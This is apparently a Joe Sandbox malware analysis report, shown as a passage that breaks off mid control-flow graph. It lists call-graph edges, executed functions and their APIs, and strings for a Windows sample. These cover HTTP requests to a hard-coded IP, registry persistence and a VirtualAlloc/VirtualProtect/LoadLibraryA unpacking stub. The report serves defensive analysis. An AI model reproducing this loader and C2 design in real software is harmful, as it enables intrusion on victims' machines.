29511->29516 29517 406968 29512->29517 29514 40674a 29519 402390 39 API calls 29514->29519 29736 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29515->29736 29516->29385 29713 4079d0 53 API calls 2 library calls 29516->29713 29521 408e00 43 API calls 29517->29521 29518 4067cf 29522 402390 39 API calls 29518->29522 29519->29385 29526 406980 29521->29526 29527 4067d7 29522->29527 29523 406829 29524 402390 39 API calls 29523->29524 29528 406831 29524->29528 29529 402390 39 API calls 29526->29529 29733 408050 53 API calls 2 library calls 29527->29733 29737 4081d0 53 API calls 2 library calls 29528->29737 29532 40698e 29529->29532 29534 402390 39 API calls 29532->29534 29533 406836 29539 402460 43 API calls 29533->29539 29535 406999 29534->29535 29536 402390 39 API calls 29535->29536 29540 4069a4 29536->29540 29537 4067dc 29538 402460 43 API calls 29537->29538 29538->29364 29541 406846 29539->29541 29542 402390 39 API calls 29540->29542 29738 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29541->29738 29544 4069af 29542->29544 29545 402390 39 API calls 29544->29545 29547 4069ba 29545->29547 29546 40684f 29548 402390 39 API calls 29546->29548 29549 402390 39 API calls 29547->29549 29550 406857 29548->29550 29551 4069c5 29549->29551 29739 408250 53 API calls 2 library calls 29550->29739 29553 402390 39 API calls 29551->29553 29554 4069d0 29553->29554 29555 402390 39 API calls 29554->29555 29557 4069df 29555->29557 29556 406a3e Sleep 29556->29557 29557->29556 29558 402460 43 API calls 29557->29558 29559 406a47 29557->29559 29558->29557 29560 402390 39 API calls 29559->29560 29561 406a4f 29560->29561 29741 408c80 43 API calls 2 library calls 29561->29741 29563 406a60 29742 408c80 43 API calls 2 library calls 29563->29742 29565 406a79 29743 408c80 43 API calls 2 library calls 29565->29743 29567 406a8c 29744 404f70 130 API calls 6 library calls 29567->29744 29570 402830 29569->29570 29571 40277f 29569->29571 29587 401600 43 API calls 3 library calls 29570->29587 29572 40278b __InternalCxxFrameHandler 29571->29572 29574 4027b3 29571->29574 29577 4027f7 29571->29577 29578 4027ee 29571->29578 29572->29253 29585 401560 41 API calls 4 library calls 29574->29585 29575 402835 29588 401560 41 API calls 3 library calls 29575->29588 29584 4027cf __InternalCxxFrameHandler 29577->29584 29586 401560 41 API calls 4 library calls 29577->29586 29578->29574 29578->29575 29579 4027c6 29579->29584 29589 40cfef 29579->29589 29584->29253 29585->29579 29586->29584 29587->29575 29588->29579 29594 40cf2b 39 API calls __cftof 29589->29594 29591 40cffe 29595 40d00c 11 API calls __CreateFrameInfo 29591->29595 29593 40d00b 29594->29591 29595->29593 29597 41085b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 29596->29597 29597->29256 29745 4128e2 GetLastError 29598->29745 29612 403af1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29601->29612 29605 403c33 29605->29264 29606 403b8d 29607 403bd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29606->29607 29608 403c37 29606->29608 29784 409a17 29607->29784 29610 40cfef 39 API calls 29608->29610 29609 403b75 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29609->29607 29609->29608 29792 408f80 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29609->29792 29611 403c3c 29610->29611 29612->29608 29612->29609 29791 408c80 43 API calls 2 library calls 29612->29791 29614 406c6c 29613->29614 29622 406c9e 29613->29622 29794 409cc5 6 API calls 29614->29794 29615 409a17 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29617 406cb0 29615->29617 29617->29266 29618 406c76 29618->29622 29795 409fd7 42 API calls 29618->29795 29620 406c94 29796 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29620->29796 29622->29615 29624 40239b 29623->29624 29625 4023b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29623->29625 29624->29625 29626 40cfef 39 API calls 29624->29626 29625->29270 29627 4023da 29626->29627 29628 402411 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 29627->29628 29629 40cfef 39 API calls 29627->29629 29628->29270 29630 40245c 29629->29630 29632 406f0e 29631->29632 29640 406f48 29631->29640 29797 409cc5 6 API calls 29632->29797 29633 409a17 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29636 406f5b 29633->29636 29635 406f18 29635->29640 29798 409fd7 42 API calls 29635->29798 29636->29272 29638 406f3e 29799 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29638->29799 29640->29633 29642 4017b3 __CreateFrameInfo 29641->29642 29800 409b8a 29642->29800 29644 4017ca __CreateFrameInfo 29644->29403 29646 408422 29645->29646 29654 40845e 29645->29654 29827 409cc5 6 API calls 29646->29827 29647 409a17 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29649 408470 29647->29649 29649->29412 29650 40842c 29650->29654 29828 409fd7 42 API calls 29650->29828 29652 408454 29829 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29652->29829 29654->29647 29656 4083ce 29655->29656 29657 40839c 29655->29657 29658 409a17 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29656->29658 29830 409cc5 6 API calls 29657->29830 29660 4083e0 29658->29660 29660->29435 29661 4083a6 29661->29656 29831 409fd7 42 API calls 29661->29831 29663 4083c4 29832 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29663->29832 29666 40830d 29665->29666 29674 408352 29665->29674 29833 409cc5 6 API calls 29666->29833 29668 409a17 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29670 408365 29668->29670 29669 408317 29669->29674 29834 409fd7 42 API calls 29669->29834 29670->29460 29672 408348 29835 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 29672->29835 29674->29668 29676 408db4 29675->29676 29836 409310 29676->29836 29678 40690e 29679 408e00 29678->29679 29680 408e1b 29679->29680 29682 408e2f __InternalCxxFrameHandler 29680->29682 29842 402840 43 API calls 3 library calls 29680->29842 29682->29497 29843 409130 29683->29843 29685 40693b 29685->29504 29686->29281 29687->29288 29688->29296 29689->29307 29690->29317 29691->29350 29692->29355 29693->29350 29694->29282 29695->29298 29696->29310 29697->29321 29698->29334 29699->29353 29700->29350 29701->29398 29702->29294 29703->29299 29704->29324 29705->29338 29706->29358 29707->29378 29708->29397 29709->29423 29710->29443 29711->29477 29712->29489 29713->29319 29714->29323 29715->29360 29716->29381 29717->29406 29718->29426 29719->29448 29720->29471 29721->29359 29722->29409 29723->29431 29724->29451 29725->29475 29726->29493 29727->29514 29728->29408 29729->29454 29730->29479 29731->29495 29732->29518 29733->29537 29734->29456 29735->29499 29736->29523 29737->29533 29738->29546 29739->29537 29740->29375 29741->29563 29742->29565 29743->29567 29746 4128fe 29745->29746 29747 4128f8 29745->29747 29751 412902 29746->29751 29775 4135e5 6 API calls __dosmaperr 29746->29775 29774 4135a6 6 API calls __dosmaperr 29747->29774 29750 41291a 29750->29751 29752 412922 29750->29752 29753 412987 SetLastError 29751->29753 29776 413294 14 API calls __dosmaperr 29752->29776 29755 405aa8 Sleep 29753->29755 29756 412997 29753->29756 29755->29259 29783 411109 39 API calls __CreateFrameInfo 29756->29783 29757 41292f 29758 412937 29757->29758 29759 412948 29757->29759 29777 4135e5 6 API calls __dosmaperr 29758->29777 29778 4135e5 6 API calls __dosmaperr 29759->29778 29764 412945 29780 4132f1 14 API calls __dosmaperr 29764->29780 29765 412954 29766 412958 29765->29766 29767 41296f 29765->29767 29779 4135e5 6 API calls __dosmaperr 29766->29779 29781 412710 14 API calls __dosmaperr 29767->29781 29771 41296c 29771->29753 29772 41297a 29782 4132f1 14 API calls __dosmaperr 29772->29782 29774->29746 29775->29750 29776->29757 29777->29764 29778->29765 29779->29764 29780->29771 29781->29772 29782->29771 29785 409a20 IsProcessorFeaturePresent 29784->29785 29786 409a1f 29784->29786 29788 409a67 29785->29788 29786->29605 29793 409a2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29788->29793 29790 409b4a 29790->29605 29791->29612 29792->29606 29793->29790 29794->29618 29795->29620 29796->29622 29797->29635 29798->29638 29799->29640 29802 409b4c 29800->29802 29803 409b6b 29802->29803 29805 409b6d 29802->29805 29814 40fb4d 29802->29814 29823 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 29802->29823 29803->29644 29806 401560 Concurrency::cancel_current_task 29805->29806 29807 409b77 29805->29807 29821 40af80 RaiseException 29806->29821 29824 40af80 RaiseException 29807->29824 29809 40157c 29822 40ad31 40 API calls 2 library calls 29809->29822 29812 40a589 29813 4015a3 29813->29644 29820 413cb9 __dosmaperr 29814->29820 29815 413cf7 29826 40d0dd 14 API calls __dosmaperr 29815->29826 29817 413ce2 RtlAllocateHeap 29818 413cf5 29817->29818 29817->29820 29818->29802 29820->29815 29820->29817 29825 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 29820->29825 29821->29809 29822->29813 29823->29802 29824->29812 29825->29820 29826->29818 29827->29650 29828->29652 29829->29654 29830->29661 29831->29663 29832->29656 29833->29669 29834->29672 29835->29674 29837 409398 29836->29837 29840 40932a __InternalCxxFrameHandler 29836->29840 29841 4095d0 43 API calls 4 library calls 29837->29841 29839 4093aa 29839->29678 29840->29678 29841->29839 29842->29682 29844 409173 29843->29844 29845 4092fd 29844->29845 29846 40923d 29844->29846 29853 409178 __InternalCxxFrameHandler 29844->29853 29862 401600 43 API calls 3 library calls 29845->29862 29850 409272 29846->29850 29851 409298 29846->29851 29848 409302 29863 401560 41 API calls 3 library calls 29848->29863 29850->29848 29852 40927d 29850->29852 29859 40928a __InternalCxxFrameHandler 29851->29859 29861 401560 41 API calls 4 library calls 29851->29861 29860 401560 41 API calls 4 library calls 29852->29860 29853->29685 29856 40cfef 39 API calls 29858 40930c 29856->29858 29857 409283 29857->29856 29857->29859 29859->29685 29860->29857 29861->29859 29862->29848 29863->29857 29864 47a7cb9 29867 47a7cc4 29864->29867 29868 47a7cd3 29867->29868 29871 47a8464 29868->29871 29873 47a847f 29871->29873 29872 47a8488 CreateToolhelp32Snapshot 29872->29873 29874 47a84a4 Module32First 29872->29874 29873->29872 29873->29874 29875 47a84b3 29874->29875 29877 47a7cc3 29874->29877 29878 47a8123 29875->29878 29879 47a814e 29878->29879 29880 47a8197 29879->29880 29881 47a815f VirtualAlloc 29879->29881 29880->29880 29881->29880 29882 495003c 29883 4950049 29882->29883 29884 495004c 29882->29884 29898 4950e0f SetErrorMode SetErrorMode 29884->29898 29889 4950265 29890 49502ce VirtualProtect 29889->29890 29892 495030b 29890->29892 29891 4950439 VirtualFree 29896 49505f4 LoadLibraryA 29891->29896 29897 49504be 29891->29897 29892->29891 29893 49504e3 LoadLibraryA 29893->29897 29895 49508c7 29896->29895 29897->29893 29897->29896 29899 4950223 29898->29899 29900 4950d90 29899->29900 29901 4950dad 29900->29901 29902 4950238 VirtualAlloc 29901->29902 29903 4950dbb GetPEB 29901->29903 29902->29889 29903->29902 29904 607aea LoadLibraryA 29905 60c7e7 29904->29905 29906 7059ce 29907 7059b6 Sleep 29906->29907 29909 705a29 29907->29909 29910 703c5f VirtualProtect 29911 703c88 29910->29911

                      Executed Functions

                      Function 00403D40 Relevance: 57.8, APIs: 25, Strings: 7, Instructions: 1839sleepcomCOMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?,DE4EB787,74DF0F00,00000000), ref: 00403DAA
                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                      • Sleep.KERNEL32(000003E8), ref: 00403F42
                      • __Init_thread_footer.LIBCMT ref: 00404517
                      • __Init_thread_footer.LIBCMT ref: 004046DD
                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                      • __Init_thread_footer.LIBCMT ref: 00404975
                      • __Init_thread_footer.LIBCMT ref: 00404BDE
                      • CoInitialize.OLE32(00000000), ref: 00404C5F
                      • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,DE4EB787), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                      • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                      • __Init_thread_footer.LIBCMT ref: 00404046
                        • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                        • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                        • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                        • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                        • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                      • __Init_thread_footer.LIBCMT ref: 00404222
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                      • API String ID: 995133137-3578497191
                      • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                      • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                      • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59
                      Function 00404F70 Relevance: 45.4, APIs: 16, Strings: 9, Instructions: 1645sleepregistryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 498 404f70-405085 call 410822 call 4106e2 call 40b570 call 409b8a call 40b570 509 405090-40509b 498->509 510 4050e5-4050ec 509->510 511 40509d-4050b1 call 409cc5 509->511 513 40512d-405150 510->513 514 4050ee-405128 510->514 511->510 517 4050b3-4050e2 call 409fd7 call 409c7b 511->517 516 405153-405158 513->516 514->513 516->516 518 40515a-4051fc call 402760 call 409310 516->518 517->510 527 405211-40522c call 401e50 518->527 528 4051fe-405207 call 409a25 518->528 533 40525d-405285 527->533 534 40522e-40523d 527->534 528->527 537 4052b6-4052b8 533->537 538 405287-405296 533->538 535 405253-40525a call 409b7c 534->535 536 40523f-40524d 534->536 535->533 536->535 543 4058dd-405982 call 40cfef RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 536->543 541 4052f0-4052fb Sleep 537->541 542 4052ba-4052cd 537->542 539 405298-4052a6 538->539 540 4052ac-4052b3 call 409b7c 538->540 539->540 539->543 540->537 541->509 546 4052d0-4052d5 542->546 554 4059b0-4059c8 543->554 555 405984-405990 543->555 546->546 550 4052d7-4052e9 call 4024a0 546->550 550->541 561 4052eb-4052ee 550->561 559 4059f2-405a0a 554->559 560 4059ca-4059d6 554->560 557 405992-4059a0 555->557 558 4059a6-4059ad call 409b7c 555->558 557->558 564 405a42-405a47 call 40cfef 557->564 558->554 562 405a34-405a41 call 409a17 559->562 563 405a0c-405a18 559->563 566 4059e8-4059ef call 409b7c 560->566 567 4059d8-4059e6 560->567 561->541 568 405300-405389 call 40b570 call 409b8a call 40b570 561->568 569 405a2a-405a31 call 409b7c 563->569 570 405a1a-405a28 563->570 566->559 567->564 567->566 586 405390-4053a2 568->586 569->562 570->564 570->569 587 4053f3-4053fa 586->587 588 4053a4-4053b8 call 409cc5 586->588 590 4053fc-4053fe 587->590 591 40540d-405430 587->591 588->587 596 4053ba-4053f0 call 409fd7 call 409c7b 588->596 594 405400-40540b 590->594 592 405433-405438 591->592 592->592 595 40543a-4054dc call 402760 call 409310 592->595 594->591 594->594 605 4054f1-40550c call 401e50 595->605 606 4054de-4054e7 call 409a25 595->606 596->587 611 40553d-405565 605->611 612 40550e-40551d 605->612 606->605 613 405596-405598 611->613 614 405567-405576 611->614 615 405533-40553a call 409b7c 612->615 616 40551f-40552d 612->616 620 405693-40569c 613->620 621 40559e-4055a5 613->621 618 405578-405586 614->618 619 40558c-405593 call 409b7c 614->619 615->611 616->543 616->615 618->543 618->619 619->613 620->586 624 4056a2 620->624 621->620 625 4055ab-4055b3 621->625 627 405775-4057d9 call 409a25 * 3 CoUninitialize call 409a25 * 3 CoUninitialize 624->627 628 4055b9-4055bc 625->628 629 40568d 625->629 657 405807-40580d 627->657 658 4057db-4057e7 627->658 628->629 631 4055c2-4055ea call 40fb4d 628->631 629->620 637 4055f0-405602 call 40aff0 631->637 638 4055ec-4055ee 631->638 639 405605-40565c call 40fb4d call 408c80 call 4035d0 call 402ee0 637->639 638->639 639->629 664 40565e-405669 call 403430 639->664 662 40583b-405853 657->662 663 40580f-40581b 657->663 660 4057e9-4057f7 658->660 661 4057fd-405804 call 409b7c 658->661 660->543 660->661 661->657 665 405855-405861 662->665 666 40587d-405895 662->666 668 405831-405838 call 409b7c 663->668 669 40581d-40582b 663->669 664->629 683 40566b-405679 call 403430 664->683 671 405873-40587a call 409b7c 665->671 672 405863-405871 665->672 673 405897-4058a3 666->673 674 4058bf-4058dc call 409a17 666->674 668->662 669->543 669->668 671->666 672->543 672->671 679 4058b5-4058bc call 409b7c 673->679 680 4058a5-4058b3 673->680 674->543 679->674 680->543 680->679 683->629 690 40567b-40568b call 403430 683->690 690->629 693 4056a7-4056bc 690->693 694 4056c2-4056ef 693->694 696 4056f1-4056fd 694->696 697 405703-405706 694->697 696->697 698 405708-405715 697->698 699 40571b-40571e 697->699 698->699 700 405720-405723 699->700 701 40572d-405730 699->701 702 405732-405734 700->702 703 405725-40572b 700->703 701->702 704 40573b-405762 Sleep 701->704 702->704 705 405736-405739 702->705 703->702 704->694 706 405768 704->706 705->704 707 40576a-40576f Sleep 705->707 706->627 707->627
                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,DE4EB787), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                        • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                      • __Init_thread_footer.LIBCMT ref: 004050DD
                      • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                      • __Init_thread_footer.LIBCMT ref: 004053EB
                      • Sleep.KERNEL32(000007D0), ref: 00405755
                      • Sleep.KERNEL32(000007D0), ref: 0040576F
                      • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                      • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                      • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                      • API String ID: 606935701-1501174972
                      • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                      • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99
                      Function 047A8464 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1318 47a8464-47a847d 1319 47a847f-47a8481 1318->1319 1320 47a8488-47a8494 CreateToolhelp32Snapshot 1319->1320 1321 47a8483 1319->1321 1322 47a8496-47a849c 1320->1322 1323 47a84a4-47a84b1 Module32First 1320->1323 1321->1320 1322->1323 1330 47a849e-47a84a2 1322->1330 1324 47a84ba-47a84c2 1323->1324 1325 47a84b3-47a84b4 call 47a8123 1323->1325 1328 47a84b9 1325->1328 1328->1324 1330->1319 1330->1323
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 047A848C
                      • Module32First.KERNEL32(00000000,00000224), ref: 047A84AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4101417478.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFirstModule32SnapshotToolhelp32
                      • String ID:
                      • API String ID: 3833638111-0
                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction ID: 5dc7c83e20f23cc8e33816e0c8d348b8f7c13a94c26d9eda38bb56e96fa06e4a
                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction Fuzzy Hash: 8DF09635100711AFE7203FF59C8CB6EB6E8BF89725F110728E642952C0DB74F8554AA2
                      Function 004087E0 Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1334 4087e0-408807 call 402460 * 2 call 405a50 1340 40880c-408816 call 4106ab 1334->1340
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: mixtwo$nosub
                      • API String ID: 3472027048-187875987
                      • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                      • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF
                      Function 00401830 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106networkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                        • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                      Strings
                      • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                      • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                      • text, xrefs: 00401B8F
                      • http://, xrefs: 00401EF4, 004021D3
                      • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                      • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                      • GET, xrefs: 004020E7
                      Memory Dump Source
                      • Source File: 00000000.00000002.4098396299.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                      • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                      • API String ID: 2146599340-4172842843
                      • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                      • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4
                      Function 0495003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 728 495003c-4950047 729 495004c-4950263 call 4950a3f call 4950e0f call 4950d90 VirtualAlloc 728->729 730 4950049 728->730 746 4950265-4950289 call 4950a69 729->746 747 495028b-4950292 729->747 733 495004a 730->733 733->733 752 49502ce-49503c2 VirtualProtect call 4950cce call 4950ce7 746->752 749 49502a1-49502b0 747->749 751 49502b2-49502cc 749->751 749->752 751->749 758 49503d1-49503e0 752->758 759 49503e2-4950437 call 4950ce7 758->759 760 4950439-49504b8 VirtualFree 758->760 759->758 762 49505f4-49505fe 760->762 763 49504be-49504cd 760->763 766 4950604-495060d 762->766 767 495077f-4950789 762->767 765 49504d3-49504dd 763->765 765->762 771 49504e3-4950505 LoadLibraryA 765->771 766->767 772 4950613-4950637 766->772 769 49507a6-49507b0 767->769 770 495078b-49507a3 767->770 773 49507b6-49507cb 769->773 774 495086e-49508be LoadLibraryA 769->774 770->769 775 4950517-4950520 771->775 776 4950507-4950515 771->776 777 495063e-4950648 772->777 778 49507d2-49507d5 773->778 781 49508c7-49508f9 774->781 779 4950526-4950547 775->779 776->779 777->767 780 495064e-495065a 777->780 782 4950824-4950833 778->782 783 49507d7-49507e0 778->783 784 495054d-4950550 779->784 780->767 785 4950660-495066a 780->785 787 4950902-495091d 781->787 788 49508fb-4950901 781->788 786 4950839-495083c 782->786 789 49507e4-4950822 783->789 790 49507e2 783->790 791 4950556-495056b 784->791 792 49505e0-49505ef 784->792 793 495067a-4950689 785->793 786->774 794 495083e-4950847 786->794 788->787 789->778 790->782 797 495056d 791->797 798 495056f-495057a 791->798 792->765 795 4950750-495077a 793->795 